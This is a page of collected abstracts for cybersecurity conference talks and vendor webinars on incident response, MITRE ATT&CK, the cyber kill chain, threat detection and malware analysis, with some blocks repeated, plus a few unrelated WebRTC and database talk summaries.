As an incident responder, have you ever thought about how much easier an investigation would be if you had the C2 server in your possession? In this talk, we are going to deep dive a rare investigation in which Mandiant obtained a forensic copy of an attacker C2 system. You will learn about the initial compromise of the C2 server, the tools and tactics used by the attacker, and the investigative steps taken to identify the full scope of the attack. In addition, you will learn about the specific challenges involved with the analysis, the tool I developed to carve all PostGreSQL rows from a forensic image, and some unique lessons learned from performing this investigation.
This session will provide insight into highly disruptive breaches that MANDIANT investigated over the past year. It describes how threat actors have destroyed system infrastructure and taken companies offline for weeks. The threat actors are split into two categories for this talk and focused on the SHAMOON cases. I will also talk about highlights from Incident Response cases of 2017. Financially motivated vs Non Financially motivated. I will talk about how recent attacks with SHAMOON differ - their motives compared to financially motivated threat actors. Highlights from a couple of 2017 IRs - Overview of TTPs of the important State Sponsored Attacks seen in 2017.
The document discusses indicators of compromise from a cyber attack. It describes the various stages an attacker goes through from initial access to installing malware and establishing command and control. The summary analyzes the host to find malware samples, network connections, and extracted files. It also looks for indicators in network traffic, such as tools downloaded and data uploaded to attacker infrastructure. The document concludes with monitoring effectiveness of security tools and ongoing attribution of attacks.
This document discusses Mandiant's incident response methodology and technology. It covers their evolution of incident response approaches over time from disk forensics to memory forensics to live response. Mandiant's current approach involves hunting across endpoints and networks using indicators of compromise to identify compromised systems. They deploy network and host sensors to gain visibility and conduct deep analysis using tools like Mandiant Incident Response and Network Traffic Analysis Platform. The document also outlines Mandiant's incident response services and how they help organizations understand risk, identify compromises, and prepare for future incidents.
David Bianco - Enterprise Security Monitoringbsidesaugusta
The document discusses enterprise security monitoring and intel-driven detection. It outlines the benefits of aggregating data across an organization to improve visibility and detection capabilities. It then describes how indicators can be used for attribution, detection, profiling, and prediction of threats. Various detection options are evaluated like Snort, HIPS, and MIR for their ability to detect scenarios in the kill chain using available indicators.
Standardizing and Strengthening Security to Lower CostsOpenDNS
Your managed service includes anti-virus, an email filter and a firewall. So why do you still find yourself wasting resources on cleaning up and re-imaging infected customer endpoints? Learn how top MSPs are lowering costs, gaining efficiencies and fueling growth by leveraging cloud-delivered predictive security.
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...MITRE - ATT&CKcon
This talk presents a case study which demonstrates that we should consider the knowledge and wisdom contained within ATT&CK in all organizational security initiatives to make sure by fixing one thing we have not just created an opportunity.
The presentation shows how to leverage the analysis and classification of APT tactics and procedures (TTP) to guide research into new and novel techniques, specifically focusing on exfiltration and command and control.
DNS over HTTPS (DoH) aims to increase user privacy and security by preventing eavesdropping and manipulation of DNS data by man-in-the-middle attacks. Major web browsers such as Firefox are considering its implementation by default. But what could this possibly mean for exfiltration and command and control?
This session provides an end-to-end demo that shows DoH being implemented to provide full command and control in a popular attack simulation framework and discusses associated mitigations.
This session will provide insight into highly disruptive breaches that MANDIANT investigated over the past year. It describes how threat actors have destroyed system infrastructure and taken companies offline for weeks. The threat actors are split into two categories for this talk and focused on the SHAMOON cases. I will also talk about highlights from Incident Response cases of 2017. Financially motivated vs Non Financially motivated. I will talk about how recent attacks with SHAMOON differ - their motives compared to financially motivated threat actors. Highlights from a couple of 2017 IRs - Overview of TTPs of the important State Sponsored Attacks seen in 2017.
The document discusses indicators of compromise from a cyber attack. It describes the various stages an attacker goes through from initial access to installing malware and establishing command and control. The summary analyzes the host to find malware samples, network connections, and extracted files. It also looks for indicators in network traffic, such as tools downloaded and data uploaded to attacker infrastructure. The document concludes with monitoring effectiveness of security tools and ongoing attribution of attacks.
This document discusses Mandiant's incident response methodology and technology. It covers their evolution of incident response approaches over time from disk forensics to memory forensics to live response. Mandiant's current approach involves hunting across endpoints and networks using indicators of compromise to identify compromised systems. They deploy network and host sensors to gain visibility and conduct deep analysis using tools like Mandiant Incident Response and Network Traffic Analysis Platform. The document also outlines Mandiant's incident response services and how they help organizations understand risk, identify compromises, and prepare for future incidents.
David Bianco - Enterprise Security Monitoringbsidesaugusta
The document discusses enterprise security monitoring and intel-driven detection. It outlines the benefits of aggregating data across an organization to improve visibility and detection capabilities. It then describes how indicators can be used for attribution, detection, profiling, and prediction of threats. Various detection options are evaluated like Snort, HIPS, and MIR for their ability to detect scenarios in the kill chain using available indicators.
Standardizing and Strengthening Security to Lower CostsOpenDNS
Your managed service includes anti-virus, an email filter and a firewall. So why do you still find yourself wasting resources on cleaning up and re-imaging infected customer endpoints? Learn how top MSPs are lowering costs, gaining efficiencies and fueling growth by leveraging cloud-delivered predictive security.
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...MITRE - ATT&CKcon
This talk presents a case study which demonstrates that we should consider the knowledge and wisdom contained within ATT&CK in all organizational security initiatives to make sure by fixing one thing we have not just created an opportunity.
The presentation shows how to leverage the analysis and classification of APT tactics and procedures (TTP) to guide research into new and novel techniques, specifically focusing on exfiltration and command and control.
DNS over HTTPS (DoH) aims to increase user privacy and security by preventing eavesdropping and manipulation of DNS data by man-in-the-middle attacks. Major web browsers such as Firefox are considering its implementation by default. But what could this possibly mean for exfiltration and command and control?
This session provides an end-to-end demo that shows DoH being implemented to provide full command and control in a popular attack simulation framework and discusses associated mitigations.
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status QuoKatie Nickels
Katie and John from the MITRE ATT&CK team present "ATT&CKing the Status Quo: Improving Threat Intelligence and Cyber Defense with MITRE ATT&CK" at BSidesLV 2018.
Putting MITRE ATT&CK into Action with What You Have, Where You AreKatie Nickels
This document provides an overview of Katie Nickels' presentation on putting MITRE ATT&CK into action using available resources. Some key points include:
- MITRE ATT&CK is a knowledge base of adversary tactics and techniques based on real-world observations.
- It can be used for detection, assessment, threat intelligence, and adversary emulation.
- For detection, ATT&CK can help improve focus on post-exploit activity and track gaps/improvements in coverage over time. Existing data sources can be leveraged to detect techniques.
- For assessment and engineering, ATT&CK can guide decisions around tool selection and help identify visibility and risk acceptance gaps.
Conceito militar, agora aplicado a Cibersegurança, o "the cyber kill chain" foi desenvolvido pela Lockheed Martin em 2011. Ele descreve as fases que um adversário seguirá para alvejar uma Organização. São 7 fases bem definidas e este ataque é considerado bem sucedido
se / quando todas as fases foram realizadas.
(DOCUMENTO EM INGLÊS)
From ATT&CKcon 3.0
By Matt Snyder, VMWare
Insider threats are some of the most treacherous and every organization is susceptible: it's estimated that theft of Intellectual Property alone exceeds $600 billion a year. Armed with intimate knowledge of your organization and masked as legitimate business, often these attacks go unnoticed until it's too late and the damage is done. To make matters worse, threat actors are now trying to lure employees with the promise of large paydays to help carry out attacks.
These advanced attacks require advanced solutions, and we are going to demonstrate how we are using the MITRE ATT&CK framework to proactively combat these threats. Armed with these tactics and techniques, we show you how to build intelligent detections to help secure even the toughest of environments.
Automation: The Wonderful Wizard of CTI (or is it?) MITRE ATT&CK
The document describes MITRE's Threat Report Automated Mapper (TRAM) tool, which uses machine learning to automatically map cyber threat reports to MITRE ATT&CK techniques. TRAM aims to streamline the process of analyzing reports and adding information to ATT&CK, though challenges remain around prediction accuracy and identifying new techniques. The document outlines TRAM's development process and discusses balancing automation with human analysis to better integrate cyber threat intelligence into ATT&CK.
This document discusses how the MITRE ATT&CK framework can help sharpen a threat hunting program. It begins with distinguishing threat hunting from threat detection, noting that threat hunting is a proactive manual process of searching through systems to identify signs of adversary activity. The document then provides an overview of the MITRE ATT&CK framework and how its tactics and techniques can be used to structure threat hunting searches. It concludes by explaining how the ATT&CK framework helps focus hunting efforts on the specific techniques adversaries are likely using and improves the ability to communicate findings across security teams.
Most organizations have good enterprise-level security policies that define their approach to maintaining, improving, and securing their information and information systems. However, once the policies are signed by senior leadership and distributed throughout the organization, significant cybersecurity governance challenges remain. In this workshop I will explain the transforming organizational security to strengthen defenses and integrate cybersecurity with the overall approach toward security governance, risk management and compliance.
Detecting Threats: A Look at the Verizon DBIR and StealthWatchLancope, Inc.
A common theme in data breach investigations is the deficit between the time it takes an attacker to compromise a system and the time it takes for the defender to detect the attack. In many cases, victim organizations do not know they have been breached for weeks or months after the initial compromise, while attackers can gain access in a matter of minutes or hours.
The StealthWatch® System can drastically reduce the time to identify threats, giving security personnel a window of opportunity to mitigate an attack before valuable data is lost. This webinar will cover how StealthWatch quickly detects a variety of malicious activity, using threat information from the Verizon 2015 Data Breach Investigations Report as a backdrop.
Participants will learn how StealthWatch can quickly detect:
- Crimeware
- Insider threats
- Point-of-sale (POS) intrusions
- Cyber-espionage
From ATT&CKcon 3.0
By Jared Stroud, Lacework
Adversaries target common cloud misconfigurations in container-focused workflows for initial access. Whether this is Docker or Kubernetes environments, Lacework Labs has identified adversaries attempting to deploy malicious container images (T1610) , mine Cryptocurrency (T1496), and deploy C2 agents. Defenders new to the container space may be unaware of the built-in capabilities popular container runtime engines have that can help defend against rogue containers being deployed into their environment. Attendees will walk away with an understanding of what these attack patterns look like based on honeypot data Lacework has gathered over the past year, as well as techniques on how to defend their own container focused workloads.
Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...PROIDEA
Vitali presents malware techniques and tricks on how to reverse engineer and analyze malware families exploiting active directory. The talk dives deeper into pseudo-source code level analysis and malware developer implementation of Lightweight Directory Access Protocol (LDAP) harvesting techniques for lateral movement and persistence across corporate environment. The talks explores three prolific malware families such as TrickBot, QakBot, and IcedID (BokBot) and their coding routine and patterns that are focused on collecting LDAP. For example, TrickBot specifically grabs credential and group policy information stored in “SYSVOL” das well as searching for corporate machines for possible sensitive machines associated with possible point-of-sale terminals on domain controller. Vitali also presents detection and mitigation methods on how to detect active directory exploitation and discusses defense mechanisms surrounding most popular active methods used in the wild by the sophisticated groups.
This in-depth understanding of your cyber terrain informs your defense, allowing you to lay traps and pitfalls for would-be attackers. Knowing what attackers are looking for and how they are going to try to move throughout your network provides you with a key advantage. With this knowledge, Deception technology becomes a powerful weapon in your defensive arsenal.
RH-ISAC Summit 2019 - Adam Pennington - Leveraging MITRE ATT&CK™ for Detectio...Adam Pennington
Slides presented at the 2019 RH-ISAC Retail Cyber Intelligence Summit by Adam Pennington in Denver, CO on "Leveraging MITRE ATT&CK™ for Detection, Analysis & Defense"
Cloud-Enabled: The Future of Endpoint SecurityCrowdStrike
As the cost and complexity of deploying and maintaining on-premises security continues to rise, many endpoint security providers have embraced the cloud as the ideal way to deliver their solutions. Yet, incorporating cloud services into legacy architectures limits their ability to fully engage the tremendous power the cloud offers.
CrowdStrike Falcon recognized the value of cloud-delivery from the beginning, developing architecture built from the ground up to take full advantage of the cloud. CrowdStrike’s cloud-powered endpoint security not only ensures rapid deployment and infinite scalability, it increases your security posture by enabling real-time advanced threat protection across even the largest, distributed enterprises.
In this CrowdCast, Jackie Castelli, Sr. Product Manager will discuss:
•The advantages of endpoint protection purpose-built for the cloud – why it allows you to take full advantage of the cloud’s power
•The common concerns organizations face when evaluating cloud-based endpoint security - can privacy and control be assured?
•Real-world examples demonstrating the unique advantages offered by CrowdStrike Falcon’s innovative cloud-powered platform
Extend Network Visibility and Secure Applications and Data in AzureFidelis Cybersecurity
This document summarizes a presentation about extending network visibility in Azure using Microsoft, Gigamon, and Fidelis. It discusses Azure Virtual Network TAP, Gigamon Cloud for aggregating and distributing traffic in Azure, and how Fidelis Network can be used for threat detection, content inspection, and automated response. The integration of these solutions provides security and operations teams visibility into network traffic across Azure environments to more effectively monitor for threats and inspect content.
Combating Insider Threats – Protecting Your Agency from the Inside OutLancope, Inc.
When Edward Snowden leaked classified information to the mainstream media, it brought the dangers posed by insider threats to the forefront of public consciousness, and not without reason. Today’s agencies are drowning in fears surrounding sophisticated cyber-attacks but perhaps the most concerning type of attack out there – the insider threat. According to Forrester, abuse by malicious insiders makes up 25% of data breaches. Learn about the best practices and technologies you should be implementing now to avoid becoming the next victim of a high-profile attack.
- Become aware of the different types of insider threats, including their motives and methods of attack
- Understand why conventional security tools like firewalls, antivirus and IDS/IPS are powerless in the face of the insider threat
- Gain clarity on the various technologies, policies and best practices that should be put in place to help detect and thwart insider threats
- Discover how network logs, particularly NetFlow, can be used to cost-effectively monitor for suspicious insider behaviors that could indicate an attack
- Know about emerging attack methods such as muleware that could further escalate insider threats in the coming years
Extending Network Visibility: Down to the EndpointLancope, Inc.
In today’s world of constantly evolving security threats and attack vectors, organizations need to be vigilant about monitoring their network infrastructure. The network perimeter and security infrastructure is often challenged with the adoption of mobile devices, cloud, and BYOD policies. The need for visibility into endpoint activity has become more important than ever.
Join Josh Applebaum (Ziften), Matthew Frederickson, (Council Rock School District) and Peter Johnson (Lancope) for a complimentary webinar to learn how you can achieve real-time network visibility and intelligence for improved incident response.
Discover how you can:
- Achieve additional visibility and context to network activity
- Enhance your existing security investments (NetFlow, Firewall, SIEM, threat intelligence)
- Improve incident response by obtaining real-time and historical endpoint data
CrowdCasts Monthly: Mitigating Pass the HashCrowdStrike
Sixteen years later and Pass the Hash (PtH) is still one of the most common techniques a targeted attacker can use to compromise a network. There have been many blogs, webinars, and papers covering different PtH mitigation strategies. With all the information about this particular security vulnerability, networks are still continuously attacked and infiltrated using this technique. It is time to look at the problem from a holistic approach and apply the communities' collective intelligence to make this process one of the most difficult for a targeted attacker to use.
The cyber kill chain describes cyber attacks from an attacker's perspective through distinct phases: (1) reconnaissance, (2) weaponization, (3) delivery, (4) exploitation, (5) installation, (6) command and control, and (7) actions on objectives. Each phase of the kill chain can be mapped to defensive tools and actions to prevent attacks. Understanding the kill chain stages gives analysts insight into what is being attempted and how to respond appropriately. The kill chain was developed by Lockheed Martin as a method to describe intrusions and prevent advanced persistent threats by highly trained adversaries targeting sensitive information.
This document discusses the stages of targeted attacks and the techniques used at each stage. It begins by outlining the 6 main stages of targeted attacks: 1) intelligence gathering, 2) point of entry, 3) command and control communication, 4) lateral movement, 5) data discovery, and 6) data exfiltration. For each stage, it describes common tactics attackers use, such as spearphishing for the point of entry or using encrypted communications over the Tor network for exfiltration. The document emphasizes that comprehensive security measures are needed to detect threats across all stages of attack.
This document discusses two case studies involving industrial control systems security:
1) A case study of an ICS operator that used Mandiant Security Consulting Services to build a comprehensive cyber security program across both IT and operational technology.
2) A case study of how another ICS operator used passive network monitoring with FireEye PX to identify flaws in their SCADA network configuration and validate network segmentation between the business network and SCADA network.
This document discusses analyzing RDP traffic using the Bro network analysis framework. It provides background on using Bro at CrowdStrike for incident response and threat detection. It describes how the author developed a Bro script to detect RDP connections, log relevant details like usernames to a file, and identify anomalous RDP activity. Examples are given of the script identifying Nessus scans, password cracking tools, and anomalous RDP connections on non-standard ports. Future work areas discussed include passing more data to SSL and certificate analyzers and testing on higher bandwidth networks.
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status QuoKatie Nickels
Katie and John from the MITRE ATT&CK team present "ATT&CKing the Status Quo: Improving Threat Intelligence and Cyber Defense with MITRE ATT&CK" at BSidesLV 2018.
Putting MITRE ATT&CK into Action with What You Have, Where You AreKatie Nickels
This document provides an overview of Katie Nickels' presentation on putting MITRE ATT&CK into action using available resources. Some key points include:
- MITRE ATT&CK is a knowledge base of adversary tactics and techniques based on real-world observations.
- It can be used for detection, assessment, threat intelligence, and adversary emulation.
- For detection, ATT&CK can help improve focus on post-exploit activity and track gaps/improvements in coverage over time. Existing data sources can be leveraged to detect techniques.
- For assessment and engineering, ATT&CK can guide decisions around tool selection and help identify visibility and risk acceptance gaps.
Conceito militar, agora aplicado a Cibersegurança, o "the cyber kill chain" foi desenvolvido pela Lockheed Martin em 2011. Ele descreve as fases que um adversário seguirá para alvejar uma Organização. São 7 fases bem definidas e este ataque é considerado bem sucedido
se / quando todas as fases foram realizadas.
(DOCUMENTO EM INGLÊS)
From ATT&CKcon 3.0
By Matt Snyder, VMWare
Insider threats are some of the most treacherous and every organization is susceptible: it's estimated that theft of Intellectual Property alone exceeds $600 billion a year. Armed with intimate knowledge of your organization and masked as legitimate business, often these attacks go unnoticed until it's too late and the damage is done. To make matters worse, threat actors are now trying to lure employees with the promise of large paydays to help carry out attacks.
These advanced attacks require advanced solutions, and we are going to demonstrate how we are using the MITRE ATT&CK framework to proactively combat these threats. Armed with these tactics and techniques, we show you how to build intelligent detections to help secure even the toughest of environments.
Automation: The Wonderful Wizard of CTI (or is it?) MITRE ATT&CK
The document describes MITRE's Threat Report Automated Mapper (TRAM) tool, which uses machine learning to automatically map cyber threat reports to MITRE ATT&CK techniques. TRAM aims to streamline the process of analyzing reports and adding information to ATT&CK, though challenges remain around prediction accuracy and identifying new techniques. The document outlines TRAM's development process and discusses balancing automation with human analysis to better integrate cyber threat intelligence into ATT&CK.
This document discusses how the MITRE ATT&CK framework can help sharpen a threat hunting program. It begins with distinguishing threat hunting from threat detection, noting that threat hunting is a proactive manual process of searching through systems to identify signs of adversary activity. The document then provides an overview of the MITRE ATT&CK framework and how its tactics and techniques can be used to structure threat hunting searches. It concludes by explaining how the ATT&CK framework helps focus hunting efforts on the specific techniques adversaries are likely using and improves the ability to communicate findings across security teams.
Most organizations have good enterprise-level security policies that define their approach to maintaining, improving, and securing their information and information systems. However, once the policies are signed by senior leadership and distributed throughout the organization, significant cybersecurity governance challenges remain. In this workshop I will explain the transforming organizational security to strengthen defenses and integrate cybersecurity with the overall approach toward security governance, risk management and compliance.
Detecting Threats: A Look at the Verizon DBIR and StealthWatchLancope, Inc.
A common theme in data breach investigations is the deficit between the time it takes an attacker to compromise a system and the time it takes for the defender to detect the attack. In many cases, victim organizations do not know they have been breached for weeks or months after the initial compromise, while attackers can gain access in a matter of minutes or hours.
The StealthWatch® System can drastically reduce the time to identify threats, giving security personnel a window of opportunity to mitigate an attack before valuable data is lost. This webinar will cover how StealthWatch quickly detects a variety of malicious activity, using threat information from the Verizon 2015 Data Breach Investigations Report as a backdrop.
Participants will learn how StealthWatch can quickly detect:
- Crimeware
- Insider threats
- Point-of-sale (POS) intrusions
- Cyber-espionage
From ATT&CKcon 3.0
By Jared Stroud, Lacework
Adversaries target common cloud misconfigurations in container-focused workflows for initial access. Whether this is Docker or Kubernetes environments, Lacework Labs has identified adversaries attempting to deploy malicious container images (T1610) , mine Cryptocurrency (T1496), and deploy C2 agents. Defenders new to the container space may be unaware of the built-in capabilities popular container runtime engines have that can help defend against rogue containers being deployed into their environment. Attendees will walk away with an understanding of what these attack patterns look like based on honeypot data Lacework has gathered over the past year, as well as techniques on how to defend their own container focused workloads.
Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...PROIDEA
Vitali presents malware techniques and tricks on how to reverse engineer and analyze malware families exploiting active directory. The talk dives deeper into pseudo-source code level analysis and malware developer implementation of Lightweight Directory Access Protocol (LDAP) harvesting techniques for lateral movement and persistence across corporate environment. The talks explores three prolific malware families such as TrickBot, QakBot, and IcedID (BokBot) and their coding routine and patterns that are focused on collecting LDAP. For example, TrickBot specifically grabs credential and group policy information stored in “SYSVOL” das well as searching for corporate machines for possible sensitive machines associated with possible point-of-sale terminals on domain controller. Vitali also presents detection and mitigation methods on how to detect active directory exploitation and discusses defense mechanisms surrounding most popular active methods used in the wild by the sophisticated groups.
This in-depth understanding of your cyber terrain informs your defense, allowing you to lay traps and pitfalls for would-be attackers. Knowing what attackers are looking for and how they are going to try to move throughout your network provides you with a key advantage. With this knowledge, Deception technology becomes a powerful weapon in your defensive arsenal.
RH-ISAC Summit 2019 - Adam Pennington - Leveraging MITRE ATT&CK™ for Detectio...Adam Pennington
Slides presented at the 2019 RH-ISAC Retail Cyber Intelligence Summit by Adam Pennington in Denver, CO on "Leveraging MITRE ATT&CK™ for Detection, Analysis & Defense"
Cloud-Enabled: The Future of Endpoint SecurityCrowdStrike
As the cost and complexity of deploying and maintaining on-premises security continues to rise, many endpoint security providers have embraced the cloud as the ideal way to deliver their solutions. Yet, incorporating cloud services into legacy architectures limits their ability to fully engage the tremendous power the cloud offers.
CrowdStrike Falcon recognized the value of cloud-delivery from the beginning, developing architecture built from the ground up to take full advantage of the cloud. CrowdStrike’s cloud-powered endpoint security not only ensures rapid deployment and infinite scalability, it increases your security posture by enabling real-time advanced threat protection across even the largest, distributed enterprises.
In this CrowdCast, Jackie Castelli, Sr. Product Manager will discuss:
•The advantages of endpoint protection purpose-built for the cloud – why it allows you to take full advantage of the cloud’s power
•The common concerns organizations face when evaluating cloud-based endpoint security - can privacy and control be assured?
•Real-world examples demonstrating the unique advantages offered by CrowdStrike Falcon’s innovative cloud-powered platform
Extend Network Visibility and Secure Applications and Data in AzureFidelis Cybersecurity
This document summarizes a presentation about extending network visibility in Azure using Microsoft, Gigamon, and Fidelis. It discusses Azure Virtual Network TAP, Gigamon Cloud for aggregating and distributing traffic in Azure, and how Fidelis Network can be used for threat detection, content inspection, and automated response. The integration of these solutions provides security and operations teams visibility into network traffic across Azure environments to more effectively monitor for threats and inspect content.
Combating Insider Threats – Protecting Your Agency from the Inside OutLancope, Inc.
When Edward Snowden leaked classified information to the mainstream media, it brought the dangers posed by insider threats to the forefront of public consciousness, and not without reason. Today’s agencies are drowning in fears surrounding sophisticated cyber-attacks but perhaps the most concerning type of attack out there – the insider threat. According to Forrester, abuse by malicious insiders makes up 25% of data breaches. Learn about the best practices and technologies you should be implementing now to avoid becoming the next victim of a high-profile attack.
- Become aware of the different types of insider threats, including their motives and methods of attack
- Understand why conventional security tools like firewalls, antivirus and IDS/IPS are powerless in the face of the insider threat
- Gain clarity on the various technologies, policies and best practices that should be put in place to help detect and thwart insider threats
- Discover how network logs, particularly NetFlow, can be used to cost-effectively monitor for suspicious insider behaviors that could indicate an attack
- Know about emerging attack methods such as muleware that could further escalate insider threats in the coming years
Extending Network Visibility: Down to the EndpointLancope, Inc.
In today’s world of constantly evolving security threats and attack vectors, organizations need to be vigilant about monitoring their network infrastructure. The network perimeter and security infrastructure is often challenged with the adoption of mobile devices, cloud, and BYOD policies. The need for visibility into endpoint activity has become more important than ever.
Join Josh Applebaum (Ziften), Matthew Frederickson, (Council Rock School District) and Peter Johnson (Lancope) for a complimentary webinar to learn how you can achieve real-time network visibility and intelligence for improved incident response.
Discover how you can:
- Achieve additional visibility and context to network activity
- Enhance your existing security investments (NetFlow, Firewall, SIEM, threat intelligence)
- Improve incident response by obtaining real-time and historical endpoint data
CrowdCasts Monthly: Mitigating Pass the HashCrowdStrike
Sixteen years later and Pass the Hash (PtH) is still one of the most common techniques a targeted attacker can use to compromise a network. There have been many blogs, webinars, and papers covering different PtH mitigation strategies. With all the information about this particular security vulnerability, networks are still continuously attacked and infiltrated using this technique. It is time to look at the problem from a holistic approach and apply the communities' collective intelligence to make this process one of the most difficult for a targeted attacker to use.
The cyber kill chain describes cyber attacks from an attacker's perspective through distinct phases: (1) reconnaissance, (2) weaponization, (3) delivery, (4) exploitation, (5) installation, (6) command and control, and (7) actions on objectives. Each phase of the kill chain can be mapped to defensive tools and actions to prevent attacks. Understanding the kill chain stages gives analysts insight into what is being attempted and how to respond appropriately. The kill chain was developed by Lockheed Martin as a method to describe intrusions and prevent advanced persistent threats by highly trained adversaries targeting sensitive information.
This document discusses the stages of targeted attacks and the techniques used at each stage. It begins by outlining the 6 main stages of targeted attacks: 1) intelligence gathering, 2) point of entry, 3) command and control communication, 4) lateral movement, 5) data discovery, and 6) data exfiltration. For each stage, it describes common tactics attackers use, such as spearphishing for the point of entry or using encrypted communications over the Tor network for exfiltration. The document emphasizes that comprehensive security measures are needed to detect threats across all stages of attack.
This document discusses two case studies involving industrial control systems security:
1) A case study of an ICS operator that used Mandiant Security Consulting Services to build a comprehensive cyber security program across both IT and operational technology.
2) A case study of how another ICS operator used passive network monitoring with FireEye PX to identify flaws in their SCADA network configuration and validate network segmentation between the business network and SCADA network.
This document discusses analyzing RDP traffic using the Bro network analysis framework. It provides background on using Bro at CrowdStrike for incident response and threat detection. It describes how the author developed a Bro script to detect RDP connections, log relevant details like usernames to a file, and identify anomalous RDP activity. Examples are given of the script identifying Nessus scans, password cracking tools, and anomalous RDP connections on non-standard ports. Future work areas discussed include passing more data to SSL and certificate analyzers and testing on higher bandwidth networks.
WebRTC Infrastructure the Hard Parts: MediaDialogic Inc.
Discussion on handling WebRTC media:
-What are the main reasons to terminate WebRTC media
-Media server use cases in WebRTC
-Client-side media processing vs. server-side trade-offs
-Potential media services for today & tomorrow
-Introduction to the Media Resource Broker (MRB) for scaling and orchestrating media servers/MRF
-How media handling architectures are evolving & scaling for cloud/NFV networks
[CB20] Operation Chimera - APT Operation Targets Semiconductor Vendors by CK ...CODE BLUE
This presentation provides an analysis of the advanced persistent threat (APT) attacks that have occurred during the past two years on the semiconductor industry. Our research shows that the majority of these attacks were concentrated on the Taiwan semiconductor sector. This is worthy of concern, as Taiwan's semiconductor industry plays a very crucial role in the world. Even a small disruption in the supply chain could have a serious ripple effect throughout the entire industry. Surprisingly, up until now, there has been less coverage on these attacks. In this presentation, we seek to shed light on the threat actors and campaigns of these attacks, where they are collectively referred to as Operation Chimera (a.k.a. Skeleton). Additionally, we provide a brief overview of the current information security status of Taiwan's semiconductor industry.
Between 2018 and 2019, we discovered several attacks on various semiconductor vendors located at the Hsinchu Science-based Industrial Park in Taiwan. As these attacks employed similar attack techniques and tactics, a pattern could be discerned from the malicious activities. From this pattern, we deduced that these attacks, which we dubbed Operation Chimera, were actually conducted by the same threat actor. The main objective of these attacks appeared to be stealing intelligence, specifically documents about IC chips, software development kits (SDKs), IC designs, the source code, etc. If such documents are successfully stolen, the impact can be devastating. The motive behind these attacks likely stems from competitors or even countries seeking to gain a competitive advantage over rivals.
In this webinar, we review the benefits of deploying a microservices architecture with Cassandra as your backbone in order to ensure your applications become incredibly reliable. We discuss in detail:
- How to create microservices in Node.js with ExpressJs and Seneca
- Tuning the Node.js driver for Cassandra: error handling, load balancing and degrees of parallelism
- Additional best practices to ensure your systems are highly performant and available
The sample service is available on GitHub: https://github.com/jorgebay/killr-service
The document discusses considerations for server-side WebRTC infrastructure. It describes how WebRTC uses STUN and TURN servers to handle NAT traversal so clients can establish direct peer-to-peer connections. However, media servers and WebRTC gateways are also important to provide value-added functions like conferencing, recording, transcoding and interoperating WebRTC with existing VoIP networks. The document compares different approaches for multi-party video, including mesh, MCU, SFU and simulcast, and how servers can optimize resource usage for large scale conferencing.
The need for a hardened development environment is key since the implications are far-reaching, from IP compromise to ransomware that can effectively lock you out of your own code repository. The impact can potentially put several man-years worth of effort at risk.
Original copy at https://www.synerzip.com/webinar/botnet-detection-countermeasures-2/
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...CODE BLUE
We are swamped with new types of malware every day. The goal of malware analysis is not to reveal every single detail of the malware. It is more important to develop tools for efficiency or introduce automation to avoid repeating the same analysis process. Therefore, malware analysts usually actively develop tools and build analysis systems. On the other hand, it costs a lot for such tool developments and system maintenance. Incident trends change daily, and malware keeps evolving. However, it is not easy to keep up with new threats. Malware analysts spend a long time maintaining their analysis systems, and it results in reducing their time for necessary analysis of new types of malware.
To solve these problems, we incorporate DevOps practices into malware analysis to reduce the cost of system maintenance by using CI/CD and Serverless. This presentation shares our experience on how CI/CD, Serverless, and other cloud technologies can be used to streamline malware analysis. Specifically, the following case studies are discussed.
* Malware C2 Monitoring
* Malware Hunting using Cloud
* YARA CI/CD system
* Malware Analysis System on Cloud
* Memory Forensic on Cloud
Through the above case studies, we will share the benefits and tips of using the cloud and show how to build a similar system using Infrastructure as Code (IaC). The audience will learn how to improve the efficiency of malware analysis and build a malware analysis system using Cloud infrastructure.
Web rtc infrastructure the hard parts v4Dialogic Inc.
This document discusses the infrastructure challenges of WebRTC including network address translation traversal using TURN servers, media gateways for interworking between protocols, and media servers. Media servers are needed for conferencing, transcoding, server-side media processing for applications, security, and reliability. New approaches like selective forwarding units and simulcast aim to improve scalability of media distribution compared to traditional mesh-based conferencing. The document concludes that while terminating media on servers has costs, it is often necessary and architectures are evolving to make media processing more efficient.
Using hypervisor and container technology to increase datacenter security pos...Black Duck by Synopsys
As presented by Tim Mackey, Senior Technical Evangelist - Black Duck Software, at LinuxCon/ContainerCon 2016:
Cyber threats consistently rank as a high priority for data center operators and their reliability teams. As increasingly sophisticated attacks mount, the risk associated with a zero-day attack is significant. Traditional responses include perimeter monitoring and anti-malware agents. Unfortunately, those techniques introduce performance and management challenges when used at large VM densities, and may not work well with containerized applications.
Fortunately, the Xen Project community has collaborated to create a solution which reduces the potential of success associated with rootkit attack vectors. When combined with recent advancements in processor capabilities, and secure development models for container deployment, it’s possible to both protect against and be proactively alerted to potential zero-day attacks. In this session, we’ll cover models to limit the scope of compromise should an attack be mounted against your infrastructure. Two attack vectors will be illustrated, and we’ll see how it’s possible to be proactively alerted to potential zero-day actions without requiring significant reconfiguration of your datacenter environment.
Technology elements explored include those from Black Duck, Bitdefender, Citrix, Intel and Guardicore.
Using hypervisor and container technology to increase datacenter security pos...Tim Mackey
As presented at LinuxCon/ContainerCon 2016:
Cyber threats consistently rank as a high priority for data center operators and their reliability teams. As increasingly sophisticated attacks mount, the risk associated with a zero-day attack is significant. Traditional responses include perimeter monitoring and anti-malware agents. Unfortunately, those techniques introduce performance and management challenges when used at large VM densities, and may not work well with containerized applications.
Fortunately, the Xen Project community has collaborated to create a solution which reduces the potential of success associated with rootkit attack vectors. When combined with recent advancements in processor capabilities, and secure development models for container deployment, it’s possible to both protect against and be proactively alerted to potential zero-day attacks. In this session, we’ll cover models to limit the scope of compromise should an attack be mounted against your infrastructure. Two attack vectors will be illustrated, and we’ll see how it’s possible to be proactively alerted to potential zero-day actions without requiring significant reconfiguration of your datacenter environment.
Technology elements explored include those from Black Duck, Bitdefender, Citrix, Intel and Guardicore.
2016, A new era of OS and Cloud SecurityTudor Damian
